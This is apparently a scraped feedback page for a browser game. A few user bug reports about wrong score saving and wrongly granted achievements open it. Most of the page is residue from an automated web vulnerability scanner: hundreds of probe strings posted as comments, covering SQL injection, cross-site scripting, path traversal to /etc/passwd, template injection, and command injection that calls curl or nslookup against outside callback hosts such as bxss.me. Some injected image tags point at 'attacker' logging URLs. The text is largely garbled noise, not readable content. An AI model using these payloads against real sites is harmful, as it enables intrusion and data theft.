Feedback
Submit suggestionTwo major glitches by BeyPokéDig - 154 months ago
1) Sometimes, when I completely destroy a site, the score will save to a different one that I have already played, but which I don't even have open in another tab. (Example: if i remember correctly, my Reddit score is actually from Cracked.com and my own kickassapp player profile score is actually from Reddit or something) This has happened 4 or 5 times so far
2) I and 24 other people (I don't know who though) got the 30 day achievement. This is my 3rd day playing (actually 4th now but it was 3rd when I began writing) and I havent even clicked the Daily site button 30 times. I clicked twice today, 7 or so times yesterday and 2 times two days ago. I think I haven't even destroyed the Site of the day 30 times in total. (However, it would be nice if I could keep the achievement as a reward for reporting this glitch :) )
There's also a minor glitch which you are probably aware of - nobody has the new achievement. I hope you will let the people who have done it before it was released get it automatically, even though i haven't met the requirements myself before its release :)
the destructor
the 1) is also my problem. watch my feedback "It doesn't work"رامین رضوانی
sadBoogerflicker
A glitch I ran across was for the Facebook Achievment. If you had facebook.com opened in a tab and were destroying another site it would eventually give you the achievement for destroying facebook.com.Boogerflicker
I believe it is caused by the bookmark. I think that when you load the kickass bookmark it automatically registers every website opened and as you destroy one it is thinking it is destroying both.ilomilo 123
the 1th Achievment does not workRandom person1
i can't do most of the acchivementslxbfYeaa
1lxbfYeaa
1JJJ3QQQ
JJJ30QQQWfxYANoW
1WfxYANoW
1Dt0DsB0M6O1CixZGPR4NO
1WfxYANoW
1<esi:include src="http://bxss.me/rpb.png"/>WfxYANoW
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpgWfxYANoW
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpgWfxYANoW
../../../../../../../../../../../../../../etc/passwdWfxYANoW
Http://bxss.me/t/fit.txtWfxYANoW
http://bxss.me/t/fit.txt?.jpgAnonymous
1WfxYANoW
/etc/shellsWfxYANoW
../../../../../../../../../../../../../../windows/win.iniWfxYANoW
${9999392+9999025}WfxYANoW
file:///etc/passwd${10000060+10000184}
1WfxYANoW
response.write(9429655*9122747)WfxYANoW
echo shhfzu$()\ ufkjhe\nz^xyu||a #' &echo shhfzu$()\ ufkjhe\nz^xyu||a #|" &echo shhfzu$()\ ufkjhe\nz^xyu||a #WfxYANoW
1WfxYANoW
'+response.write(9429655*9122747)+'WfxYANoW
&echo nhlhnn$()\ wphzno\nz^xyu||a #' &echo nhlhnn$()\ wphzno\nz^xyu||a #|" &echo nhlhnn$()\ wphzno\nz^xyu||a #WfxYANoW
"+response.write(9429655*9122747)+"response.write(9483815*9052294)
1WfxYANoW
../1WfxYANoW
1&echo erhmsd$()\ jvxgiq\nz^xyu||a #' &echo erhmsd$()\ jvxgiq\nz^xyu||a #|" &echo erhmsd$()\ jvxgiq\nz^xyu||a #WfxYANoW
../../../../../../../../../../../../../../etc/shellsWfxYANoW
QZq5jIFH'+response.write(9483815*9052294)+'
1WfxYANoW
|echo jhbcpb$()\ abbfkl\nz^xyu||a #' |echo jhbcpb$()\ abbfkl\nz^xyu||a #|" |echo jhbcpb$()\ abbfkl\nz^xyu||a #WfxYANoW
c:/windows/win.iniWfxYANoW
1&n993736=v998383WfxYANoW
xQSHbQJM: 4GA11GZ5WfxYANoW
bxss.meWfxYANoW&n982876=v961850
1WfxYANoW
1|echo gjftao$()\ zwufjw\nz^xyu||a #' |echo gjftao$()\ zwufjw\nz^xyu||a #|" |echo gjftao$()\ zwufjw\nz^xyu||a #file:///etc/passwd
1smijvIFj
1"+response.write(9483815*9052294)+"
1xT0SEXui: zpwIKqY2
1VGN5YXFpUVA=
1WfxYANoW
)WfxYANoW
1WfxYANoW
'.gethostbyname(lc('hituu'.'spszhifrb9262.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(65).chr(109).chr(79).'WfxYANoW
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));WfxYANoW
(nslookup -q=cname hitmplrsywbbi414b7.bxss.me||curl hitmplrsywbbi414b7.bxss.me))../WfxYANoW
1WfxYANoW
1WfxYANoW
".gethostbyname(lc("hitqu"."mgupvmyud638e.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(82).chr(109).chr(65)."WfxYANoW
';print(md5(31337));$a='WfxYANoW
$(nslookup -q=cname hitojuudjhvzdc3b31.bxss.me||curl hitojuudjhvzdc3b31.bxss.me)WfxYANoW
gethostbyname(lc('hitbn'.'ijyolpyre9e93.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(80).chr(117).chr(80)WfxYANoW
!(()&&!|*|*|WfxYANoW
xfs.bxss.me1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
1WfxYANoW
";print(md5(31337));$a="WfxYANoW
^(#$!@#$)(()))******WfxYANoW
${@print(md5(31337))}Http://bxss.me/t/fit.txt
1WfxYANoW
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))xfs.bxss.me
1http://bxss.me/t/fit.txt?.jpg
1WfxYANoW
&nslookup -q=cname hitelwnuxbqxg982e5.bxss.me&'\"`0&nslookup -q=cname hitelwnuxbqxg982e5.bxss.me&`')
1WfxYANoW
${@print(md5(31337))}\/etc/shells
1WfxYANoW
'"WfxYANoW
1'"()&%<zzz><ScRiPt >ENu1(9792)</ScRiPt>WfxYANoW
'"()WfxYANoW
&(nslookup -q=cname hitcwtnlabozt4e857.bxss.me||curl hitcwtnlabozt4e857.bxss.me)&'\"`0&(nslookup -q=cname hitcwtnlabozt4e857.bxss.me||curl hitcwtnlabozt4e857.bxss.me)&`'WfxYANoW
HttP://bxss.me/t/xss.html?%00WfxYANoW
<!--WfxYANoW
'.print(md5(31337)).'!(()&&!|*|*|
1'"
1WfxYANoW
1'&&sleep(27*1000)*wgljun&&'WfxYANoW
bxss.me/t/xss.html?%00^(#$!@#$)(()))******
1';print(md5(31337));$a='
1<!--
1c:/windows/win.ini
1WfxYANoW
|(nslookup -q=cname hithbqdwdwrdncda62.bxss.me||curl hithbqdwdwrdncda62.bxss.me)WfxYANoW
commentWfxYANoW
1"&&sleep(27*1000)*rurcjp&&"bxss.me
1WfxYANoW
1'||sleep(27*1000)*nfkkea||'";print(md5(31337));$a="
1WfxYANoW
'"()&%<zzz><ScRiPt >ENu1(9371)</ScRiPt>WfxYANoW
"+"A".concat(70-3).concat(22*4).concat(113).concat(84).concat(121).concat(75)+(require"socket" Socket.gethostbyname("hiteo"+"yharezce4b010.bxss.me.")[3].to_s)+"WfxYANoW
comment�${@print(md5(31337))}
1WfxYANoW
1"||sleep(27*1000)*oxggsr||"WfxYANoW
`(nslookup -q=cname hitfjihwlmrwxc6244.bxss.me||curl hitfjihwlmrwxc6244.bxss.me)`WfxYANoW
'+'A'.concat(70-3).concat(22*4).concat(101).concat(81).concat(119).concat(84)+(require'socket' Socket.gethostbyname('hitrs'+'asydwfto65114.bxss.me.')[3].to_s)+'${@print(md5(31337))}\
1WfxYANoW
;(nslookup -q=cname hitlwogfybomi62dac.bxss.me||curl hitlwogfybomi62dac.bxss.me)|(nslookup -q=cname hitlwogfybomi62dac.bxss.me||curl hitlwogfybomi62dac.bxss.me)&(nslookup -q=cname hitlwogfybomi62dac.bxss.me||curl hitlwogfybomi62dac.bxss.me)WfxYANoW
comment/.WfxYANoW
1WfxYANoW
'A'.concat(70-3).concat(22*4).concat(118).concat(68).concat(117).concat(84)+(require'socket' Socket.gethostbyname('hitlt'+'rdubgabd35d96.bxss.me.')[3].to_s)comment
1'.print(md5(31337)).'
1comment�
1WfxYANoW
19325414'"()
1HttP://bxss.me/t/xss.html?%00
1comment/.
1WfxYANoW
|(nslookup${IFS}-q${IFS}cname${IFS}hitoyjtgtylgic7f7b.bxss.me||curl${IFS}hitoyjtgtylgic7f7b.bxss.me)WfxYANoW'&&sleep(27*1000)*cjiawi&&'
1WfxYANoW
&(nslookup${IFS}-q${IFS}cname${IFS}hitfckksgkhjs3e42d.bxss.me||curl${IFS}hitfckksgkhjs3e42d.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitfckksgkhjs3e42d.bxss.me||curl${IFS}hitfckksgkhjs3e42d.bxss.me)&`'bxss.me/t/xss.html?%00
1WfxYANoW"&&sleep(27*1000)*iqebcl&&"
1WfxYANoW'||sleep(27*1000)*gdioyw||'
1WfxYANoW
1WfxYANoW"||sleep(27*1000)*fxwmqs||"
1WfxYANoW
bfg10329<s1﹥s2ʺs3ʹhjl10329WfxYANoW
<%={{={@{#{${dfb}}%>WfxYANoW
<th:t="${dfb}#foreachWfxYANoW
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>WfxYANoW
dfb{{98991*97996}}xcaWfxYANoW
dfb[[${98991*97996}]]xcaWfxYANoW
dfb__${98991*97996}__::.xWfxYANoW
1WfxYANoW
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")WfxYANoW
1<ScRiPt >ENu1(9636)</ScRiPt>WfxYANoW
1<WNELCQ>E1GDR[!+!]</WNELCQ>WfxYANoW
1<script>ENu1(9802)</script>WfxYANoW
1<script>ENu1(9923)</script>9923WfxYANoW
11eJU61zJWfxYANoW
1<ScR<ScRiPt>IpT>ENu1(9974)</sCr<ScRiPt>IpT>WfxYANoW
1<ScRiPt >ENu1(9036)</ScRiPt>WfxYANoW
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9118></ScRiPt>WfxYANoW
1<�ScRiPt >ENu1(9877)</ScRiPt>WfxYANoW
1WfxYANoW
1<isindex type=image src=1 onerror=ENu1(9416)>WfxYANoW
-1 OR 2+989-989-1=0+0+0+1 --WfxYANoW
-1 OR 2+39-39-1=0+0+0+1WfxYANoW
-1' OR 2+610-610-1=0+0+0+1 --WfxYANoW
-1' OR 2+29-29-1=0+0+0+1 or '5gpFbEdg'='WfxYANoW
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9398'>WfxYANoW
-1" OR 2+774-774-1=0+0+0+1 --WfxYANoW
1<body onload=ENu1(9711)>WfxYANoW
1<img src=//xss.bxss.me/t/dot.gif onload=ENu1(9126)>WfxYANoW
1<img src=xyz OnErRor=ENu1(9261)>WfxYANoW
1<img/src=">" onerror=alert(9469)>WfxYANoW
%31%3C%53%63%52%69%50%74%20%3E%45%4E%75%31%289824%29%3C%2F%73%43%72%69%70%54%3EWfxYANoW
1\u003CScRiPt\ENu1(9348)\u003C/sCripT\u003EWfxYANoW
1<ScRiPt>ENu1(9388)</sCripT>WfxYANoW
1<input autofocus onfocus=ENu1(9872)>WfxYANoW
<a HrEF=http://xss.bxss.me></a>WfxYANoW
<a HrEF=jaVaScRiPT:>WfxYANoW
1}body{zzz:Expre/**/SSion(ENu1(9945))}WfxYANoW
1vhvHP <ScRiPt >ENu1(9848)</ScRiPt>WfxYANoW
1*if(now()=sysdate(),sleep(15),0)WfxYANoW
1<WDNMCT>J5OGF[!+!]</WDNMCT>WfxYANoW
1<ifRAme sRc=9295.com></IfRamE>WfxYANoW
1<akPlVCo x=9674>WfxYANoW
1<img sRc='http://attacker-9483/log.php?WfxYANoW
1<aKMPTsn<WfxYANoW'"()&%<zzz><ScRiPt >ENu1(9357)</ScRiPt>
1'"()&%<zzz><ScRiPt >ENu1(9869)</ScRiPt>
1WfxYANoW9047895
1bfg3118<s1﹥s2ʺs3ʹhjl3118
1<%={{={@{#{${dfb}}%>
1<th:t="${dfb}#foreach
11}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
1WfxYANoW
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Zdfb{{98991*97996}}xca
1dfb[[${98991*97996}]]xca
1dfb__${98991*97996}__::.x
1"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
1WfxYANoW<ScRiPt >ENu1(9418)</ScRiPt>
1WfxYANoW<WSSNPR>VKSNJ[!+!]</WSSNPR>
1WfxYANoW<script>ENu1(9437)</script>
1WfxYANoW<script>ENu1(9748)</script>9748
1WfxYANoW
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"ZWfxYANoW<ScRiPt >ENu1(9950)</ScRiPt>
1WfxYANoW<�ScRiPt >ENu1(9838)</ScRiPt>
1WfxYANoW<body onload=ENu1(9707)>
1WfxYANoW<img src=xyz OnErRor=ENu1(9127)>
1WfxYANoW<img/src=">" onerror=alert(9917)>
1WfxYANoW\u003CScRiPt\ENu1(9801)\u003C/sCripT\u003E
1WfxYANoW<ScRiPt>ENu1(9455)</sCripT>
1WfxYANoW
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/WfxYANoW<input autofocus onfocus=ENu1(9758)>
1<a HrEF=http://xss.bxss.me></a>
1<a HrEF=jaVaScRiPT:>
1WfxYANoW}body{zzz:Expre/**/SSion(ENu1(9825))}
1WfxYANoWSJqmq <ScRiPt >ENu1(9001)</ScRiPt>
1WfxYANoW<WAPW8K>JU1WG[!+!]</WAPW8K>
1WfxYANoW<ifRAme sRc=9054.com></IfRamE>
1WfxYANoW
1-1; waitfor delay '0:0:15' --WfxYANoW<aiuluqw x=9247>
1WfxYANoW<img sRc='http://attacker-9546/log.php?
1WfxYANoW<aaqE820<
1WfxYANoW
1-1); waitfor delay '0:0:15' --WfxYANoW
1-1 waitfor delay '0:0:15' --WfxYANoW
1FwJ6aIBr'; waitfor delay '0:0:15' --WfxYANoW
1-1 OR 275=(SELECT 275 FROM PG_SLEEP(15))--WfxYANoW
1-1) OR 317=(SELECT 317 FROM PG_SLEEP(15))--WfxYANoW
1-1)) OR 164=(SELECT 164 FROM PG_SLEEP(15))--WfxYANoW
1Peg2gAxz' OR 814=(SELECT 814 FROM PG_SLEEP(15))--WfxYANoW
1s29l57m4') OR 537=(SELECT 537 FROM PG_SLEEP(15))--WfxYANoW
1aM1YXKon')) OR 110=(SELECT 110 FROM PG_SLEEP(15))--WfxYANoW
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)WfxYANoW
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'WfxYANoW
1'"WfxYANoW
@@IvHOTWfxYANoW
1WfxYANoW
1WfxYANoWnUdmacEy
1WfxYANoW
1-1 OR 2+820-820-1=0+0+0+1 --
1-1 OR 2+571-571-1=0+0+0+1
1-1' OR 2+784-784-1=0+0+0+1 --
1-1' OR 2+888-888-1=0+0+0+1 or 'J6ZAjBEw'='
1-1" OR 2+792-792-1=0+0+0+1 --
1if(now()=sysdate(),sleep(15),0)
1WfxYANoW-1 waitfor delay '0:0:15' --
1WfxYANoWJfFYGcpj'; waitfor delay '0:0:15' --
1WfxYANoW'"
1@@G1Bam
1Peter Winter
555-555-0199@example.comPecedec150
555-555-0199@example.comiaqldecp
1jmcpkgom
response.write(9093445*9209117)jmcpkgom
'+response.write(9093445*9209117)+'mvdpfneg
1jmcpkgom
"+response.write(9093445*9209117)+"mvdpfneg
1response.write(9344980*9910279)
1mvdpfneg
SdhvAp8cpoftsxhc
set|set&set'+response.write(9344980*9910279)+'
1mvdpfneg
-1 OR 2+847-847-1=0+0+0+1 --poftsxhc
$(nslookup 5r49GPWB)"+response.write(9344980*9910279)+"
1pkfrqlho
Uax11jAYmvdpfneg
-1 OR 2+184-184-1=0+0+0+1poftsxhc
&nslookup LOlqkARs&'\"`0&nslookup LOlqkARs&`'vqabiaqy
../../../../../../../../../../etc/passwdTjKaEKCp
1mvdpfneg
-1' OR 2+911-911-1=0+0+0+1 --set|set&set
1vqabiaqy
../../../../../../../../../../../../../../../proc/versionaqwklwni
1mvdpfneg
-1' OR 2+831-831-1=0+0+0+1 or 'lSzF2Gc4'='$(nslookup 9N8L5AEH)
1vqabiaqy
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgmvdpfneg
-1" OR 2+396-396-1=0+0+0+1 --&nslookup xtOB4ipo&'\"`0&nslookup xtOB4ipo&`'
1vqabiaqy
../../../../../../../../../../etc/passwd�.jpgwbjowjys
${9999288+9999857}mvdpfneg
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/smptoftr
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgvqabiaqy
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg${9999680+9999201}
1mvdpfneg
(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/smptoftr
1some_inexistent_file_with_long_name�.jpgvqabiaqy
/../..//../..//../..//../..//../..//etc/passwd�.jpgOWlnSU44Qlo=
1ploeiqpa
1&n940054=v965265mvdpfneg
-1; waitfor delay '0:0:3' --aqwklwni
1smptoftr
Http://testasp.vulnweb.com/t/fit.txtvqabiaqy
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdgpkbpuqn
)mvdpfneg
-1; waitfor delay '0:0:0' --Anonymous
1smptoftr
http://testasp.vulnweb.com/t/fit.txt?.jpgvqabiaqy
/etc/passwdgpkbpuqn
!(()&&!|*|*|mvdpfneg
-1); waitfor delay '0:0:3' --smptoftr
testasp.vulnweb.comvqabiaqy
%2fetc%2fpasswdgpkbpuqn
^(#$!@#$)(()))******mvdpfneg
-1); waitfor delay '0:0:7' --vqabiaqy
/.././.././.././.././.././.././.././../etc/./passwd%00)
1mvdpfneg
1 waitfor delay '0:0:3' --mwgpotpx
;print(md5(acunetix_wvs_security_test));1some_inexistent_file_with_long_name�.jpg
1vqabiaqy
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdhwqgtjgg&n981282=v954134
1!(()&&!|*|*|
1mvdpfneg
1 waitfor delay '0:0:10' --nnkkntrn
'"()mwgpotpx
';print(md5(acunetix_wvs_security_test));$a='Http://testasp.vulnweb.com/t/fit.txt
1vqabiaqy
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd^(#$!@#$)(()))******
1mvdpfneg
mnhG0iBa'; waitfor delay '0:0:3' --mwgpotpx
";print(md5(acunetix_wvs_security_test));$a="http://testasp.vulnweb.com/t/fit.txt?.jpg
1rqwsjxfb
http://testasp.vulnweb.com/t/xss.html?%00.jpgjengmpdj
1mvdpfneg
Aw3S2Rci'; waitfor delay '0:0:10' --'"()
1mwgpotpx
${@print(md5(acunetix_wvs_security_test))}testasp.vulnweb.com
1vqabiaqy
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.http://testasp.vulnweb.com/t/xss.html?%00.jpg
1jengmpdj
commentmvdpfneg
-1;select pg_sleep(7); --ciyegvlc
http://hitgEljnPO4ya.bxss.me/mwgpotpx
${@print(md5(acunetix_wvs_security_test))}\bxwnalbi
1vqabiaqy
file:///etc/passwdyxlevpgo
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))jengmpdj
comment�mvdpfneg
-1);select pg_sleep(7); --;print(md5(acunetix_wvs_security_test));
1http://hit8HGomwp7p0.bxss.me/
1bxwnalbi
1'"vqabiaqy
/\../\../\../\../\../\../\../etc/passwdjengmpdj
comment/.mvdpfneg
-1));select pg_sleep(7); --';print(md5(acunetix_wvs_security_test));$a='
1qnxnmctj
/www.vulnweb.combxwnalbi
\vqabiaqy
WEB-INF/web.xmlyovdamda
'"jengmpdj
1mvdpfneg
ss9B7gaT';select pg_sleep(7); --";print(md5(acunetix_wvs_security_test));$a="
1/www.vulnweb.com
1vqabiaqy
/WEB-INF/web.xmlyovdamda
<!--comment
1mvdpfneg
GjomcRi1');select pg_sleep(7); --${@print(md5(acunetix_wvs_security_test))}
1rjojldqf
1'"()&%<acx><ScRiPt >9iuQ(9210)</ScRiPt>bxwnalbi
@@30BGJvqabiaqy
WEB-INF\web.xml'"
1comment�
1mvdpfneg
XcVf7TgQ'));select pg_sleep(10); --${@print(md5(acunetix_wvs_security_test))}\
1bxwnalbi
JyI=../../../../../../../../../../etc/passwd
1<!--
1comment/.
1mvdpfneg
1rjojldqf
'"()&%<acx><ScRiPt >9iuQ(9762)</ScRiPt>mvdpfneg
1T6WvqXVZ
1rjojldqf
1_9714bxwnalbi
(select convert(int,CHAR(65)))../../../../../../../../../../etc/passwd�.jpg
1-1 OR 2+168-168-1=0+0+0+1 --
1bxwnalbi
1-1 OR 2+117-117-1=0+0+0+1
11'"
1rjojldqf
acu8353<s1﹥s2ʺs3ʹuca8353-1' OR 2+713-713-1=0+0+0+1 --
1\
1.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1-1' OR 2+668-668-1=0+0+0+1 or 'pohnbEIn'='
1/etc/passwd
1-1" OR 2+183-183-1=0+0+0+1 --
1@@IOUN1
1%2fetc%2fpasswd
1JyI=
11 waitfor delay '0:0:13' --
1FxmCiz5H'; waitfor delay '0:0:13' --
1rjojldqf
{{10000425*10000020}}(select convert(int,CHAR(65)))
1l14SjI4v';select pg_sleep(13); --
1drlgRxiJ');select pg_sleep(19); --
1rjojldqf
1<ScRiPt >9iuQ(9213)</ScRiPt>BWQhadxk'));select pg_sleep(19); --
1file:///etc/passwd
1/\../\../\../\../\../\../\../etc/passwd
1WEB-INF/web.xml
1rjojldqf
1<WX0SOZ>RBS0X[!+!]</WX0SOZ>/WEB-INF/web.xml
1WEB-INF\web.xml
1rjojldqf
1<script>9iuQ(9059)</script>rjojldqf
1<ScR<ScRiPt>IpT>9iuQ(9557)</sCr<ScRiPt>IpT>rjojldqf
1<ScRiPt >9iuQ(9754)</ScRiPt>rjojldqf
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9404></ScRiPt>rjojldqf
1<�ScRiPt >9iuQ(9137)</ScRiPt>rjojldqf
1<video><source onerror="javascript:9iuQ(9707)">rjojldqf
1<isindex type=image src=1 onerror=9iuQ(9001)>rjojldqf
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9950'>rjojldqf
1<body onload=9iuQ(9676)>rjojldqf
1<img src=//testasp.vulnweb.com/t/dot.gif onload=9iuQ(9390)>rjojldqf
1<img src=xyz OnErRor=9iuQ(9339)>rjojldqf
1<img/src=">" onerror=alert(9268)>rjojldqf
%31%3C%53%63%52%69%50%74%20%3E%39%69%75%51%289143%29%3C%2F%73%43%72%69%70%54%3Erjojldqf
1\u003CScRiPt\9iuQ(9183)\u003C/sCripT\u003Erjojldqf
1<ScRiPt>9iuQ(9032)</sCripT>rjojldqf
1<input autofocus onfocus=9iuQ(9206)>rjojldqf
<a HrEF=http://www.vulnweb.com></a>rjojldqf
<a HrEF=jaVaScRiPT:>rjojldqf
[url=http://www.vulnweb.com][/url]rjojldqf
1<img<!-- --> src=x onerror=alert(9704);//><!-- -->rjojldqf
1}body{acu:Expre/**/SSion(9iuQ(9530))}rjojldqf
1<% contenteditable onresize=9iuQ(9641)>rjojldqf
1_HdkM4 <ScRiPt >9iuQ(9440)</ScRiPt>rjojldqf
1<WWFUW8>YKUVJ[!+!]</WWFUW8>rjojldqf
1<ifRAme sRc=9299.com></IfRamE>rjojldqf
1<bvlkaP x=9756>rjojldqf
1<img sRc='http://attacker-9427/log.php?rjojldqf'"()&%<acx><ScRiPt >9iuQ(9921)</ScRiPt>
1'"()&%<acx><ScRiPt >9iuQ(9960)</ScRiPt>
1rjojldqf_9404
1acu3980<s1﹥s2ʺs3ʹuca3980
1{{9999015*9999169}}
1rjojldqf<ScRiPt >9iuQ(9794)</ScRiPt>
1rjojldqf<WFVAYA>JR5FE[!+!]</WFVAYA>
1rjojldqf<script>9iuQ(9904)</script>
1rjojldqf<ScRiPt >9iuQ(9176)</ScRiPt>
1rjojldqf<�ScRiPt >9iuQ(9003)</ScRiPt>
1rjojldqf<body onload=9iuQ(9277)>
1rjojldqf<img src=xyz OnErRor=9iuQ(9031)>
1rjojldqf<img/src=">" onerror=alert(9420)>
1rjojldqf\u003CScRiPt\9iuQ(9510)\u003C/sCripT\u003E
1rjojldqf<ScRiPt>9iuQ(9093)</sCripT>
1rjojldqf<input autofocus onfocus=9iuQ(9490)>
1<a HrEF=http://www.vulnweb.com></a>
1<a HrEF=jaVaScRiPT:>
1[url=http://www.vulnweb.com][/url]
1rjojldqf}body{acu:Expre/**/SSion(9iuQ(9529))}
1rjojldqf<% contenteditable onresize=9iuQ(9991)>
1rjojldqf_yLDK9 <ScRiPt >9iuQ(9419)</ScRiPt>
1rjojldqf<WM9SN0>HQRB4[!+!]</WM9SN0>
1rjojldqf<ifRAme sRc=9242.com></IfRamE>
1rjojldqf<gSCAGS x=9080>
1rjojldqf<img sRc='http://attacker-9154/log.php?
1Comment